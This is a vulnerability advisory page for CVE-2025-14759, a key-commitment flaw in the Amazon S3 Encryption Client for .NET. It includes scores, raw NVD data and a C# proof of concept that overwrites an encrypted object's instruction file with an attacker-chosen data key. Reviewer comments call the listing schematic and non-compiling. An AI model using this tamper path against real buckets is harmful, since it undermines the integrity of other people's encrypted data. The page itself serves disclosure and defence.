Security Vulnerability Report
CVE-2025-14759 CVSS 5.3 MEDIUM

CVE-2025-14759

Published: 2025-12-17 20:15:53
Last Modified: 2026-04-15 00:35:42
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

Missing cryptographic key commitment in the Amazon S3 Encryption Client for .NET may allow a user with write access to the S3 bucket to introduce a new encrypted data key (EDK) that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for .NET to version 3.2.0 or later.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Amazon S3 Encryption Client for .NET < 3.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
csharp
// CVE-2025-14759 PoC - Amazon S3 Encryption Client for .NET EDK Replacement Attack
// This PoC demonstrates the key commitment issue when EDK is stored in instruction file
//
// NOTE(review): read this listing as a schematic of the tamper path, not as a verified
// reproduction. It uses Console, Convert, StreamReader and Task, but carries no using
// directives for System, System.IO or System.Threading.Tasks, so it does not compile as shown.
// NOTE(review): the Amazon.S3EncryptionClient namespace below has not been checked against
// the published package - confirm before relying on any type name in this listing.
//
// What a defender should take from it:
//   - The precondition is write access to the bucket; the only state-changing call is the
//     PutObject that overwrites the instruction object in PerformAttack.
//   - The remediation given in the advisory text is to upgrade the Amazon S3 Encryption
//     Client for .NET to version 3.2.0 or later.
//   - Until then, restrict who may write instruction objects, keep S3 Versioning on so an
//     overwrite is recoverable, and record S3 object-level (data event) logs so an overwrite
//     of an instruction object by an unexpected principal is visible.
using Amazon.S3EncryptionClient;
using Amazon.S3;
using Amazon.S3.Model;

/// <summary>
/// Two-part illustration for CVE-2025-14759: <see cref="PerformAttack"/> overwrites the
/// instruction object stored next to an encrypted S3 object, and <see cref="VictimDecrypts"/>
/// reads that object back through the encryption client.
/// </summary>
public class CVE_2025_14759_PoC
{
    // Bucket and object names are sample values constructed for the listing.
    private const string BucketName = "target-bucket";
    private const string TargetObjectKey = "encrypted-file.txt";

    // NOTE(review): the ".inst" suffix is this listing's choice; confirm the instruction-object
    // naming your client version actually uses before building detections on it.
    private const string InstructionFileKey = "encrypted-file.txt.inst";

    // Attacker-controlled EDK (encrypted with the same KMS key but different plaintext key)
    // The literal below is sixteen sequential bytes, i.e. a stand-in value; nothing in this
    // listing wraps a key under KMS.
    // NOTE(review): presumably a client cannot unwrap this value, so the listing shows where
    // tampering happens rather than reproducing the altered-plaintext outcome - confirm before
    // using it as a patch-validation test.
    private static readonly byte[] MaliciousEDK = new byte[] { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10 };

    /// <summary>
    /// Reads the instruction object, prints a prefix of it, then replaces the whole object
    /// with the Base64 text of <c>MaliciousEDK</c>.
    /// </summary>
    /// <returns>A task that completes after the overwrite and the final console messages.</returns>
    public static async Task PerformAttack()
    {
        // A plain (non-encrypting) S3 client with no explicit credentials or region argument.
        var s3Client = new AmazonS3Client();
        Console.WriteLine("[*] CVE-2025-14759 Attack Simulation");
        Console.WriteLine("[*] Target: " + BucketName + "/" + TargetObjectKey);

        // Step 1: Download the original instruction file
        Console.WriteLine("[+] Step 1: Downloading original instruction file...");
        // The response object itself is never disposed; only the reader wrapping its stream is.
        var instructionResponse = await s3Client.GetObjectAsync(BucketName, InstructionFileKey);
        using (var reader = new StreamReader(instructionResponse.ResponseStream))
        {
            // The downloaded text is only printed; step 2 does not use it.
            var originalEDK = await reader.ReadToEndAsync();
            // Substring(0, 20) throws ArgumentOutOfRangeException when the object body is
            // shorter than 20 characters.
            Console.WriteLine("[*] Original EDK retrieved: " + originalEDK.Substring(0, 20) + "...");
        }

        // Step 2: Replace the EDK with attacker-controlled key
        Console.WriteLine("[+] Step 2: Replacing EDK with malicious key...");
        // The new object body is a bare Base64 string. The listing does not show the
        // instruction-file format the client expects, so treat this write as illustrative.
        var maliciousInstruction = Convert.ToBase64String(MaliciousEDK);
        var putRequest = new PutObjectRequest
        {
            BucketName = BucketName,
            Key = InstructionFileKey,
            ContentBody = maliciousInstruction,
            ContentType = "application/octet-stream"
        };
        // This overwrite is the observable event: an object-level write to the instruction
        // key by a principal other than the application that encrypted the object.
        await s3Client.PutObjectAsync(putRequest);
        Console.WriteLine("[+] Malicious EDK uploaded successfully");
        Console.WriteLine("[!] Next victim decryption will use attacker's key");
    }

    // Victim-side decryption (demonstrates the vulnerability impact)
    /// <summary>
    /// Fetches the target object through the encryption client and prints whatever it returns.
    /// </summary>
    /// <returns>A task that completes once the content has been written to the console.</returns>
    public static async Task VictimDecrypts()
    {
        Console.WriteLine("\n[*] Victim attempting to decrypt data...");
        // NOTE(review): only a configuration object and static credentials are passed here; no
        // encryption materials or KMS key appear, so how this client would unwrap any EDK is
        // not shown - confirm the constructor against the SDK.
        // The "AKIA..." / "secret" pair is a placeholder. Access keys should not be embedded
        // in source; use the SDK's default credential resolution instead.
        var encryptionClient = new AmazonS3EncryptionClientV2(
            new AmazonS3CryptoConfigurationV2(),
            new Amazon.Runtime.BasicAWSCredentials("AKIA...", "secret")
        );

        // This will decrypt using the attacker's EDK, producing attacker-controlled plaintext
        // NOTE(review): that outcome is the listing's claim, not something the code checks;
        // nothing here compares the result with the originally uploaded content.
        var response = await encryptionClient.GetObjectAsync(BucketName, TargetObjectKey);
        using (var reader = new StreamReader(response.ResponseStream))
        {
            var plaintext = await reader.ReadToEndAsync();
            Console.WriteLine("[!] Decrypted content (may be attacker-controlled): " + plaintext);
        }
    }
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14759", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-12-17T20:15:52.773", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing cryptographic key commitment in the Amazon S3 Encryption Client for .NET may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an \"instruction file\" instead of S3's metadata record.\n\nTo mitigate this issue, upgrade Amazon S3 Encryption Client for .NET to version 3.2.0 or later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-032/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/amazon-s3-encryption-client-dotnet/releases/tag/release_2025-12-17", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/amazon-s3-encryption-client-dotnet/security/advisories/GHSA-4v42-65r3-3gjx", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}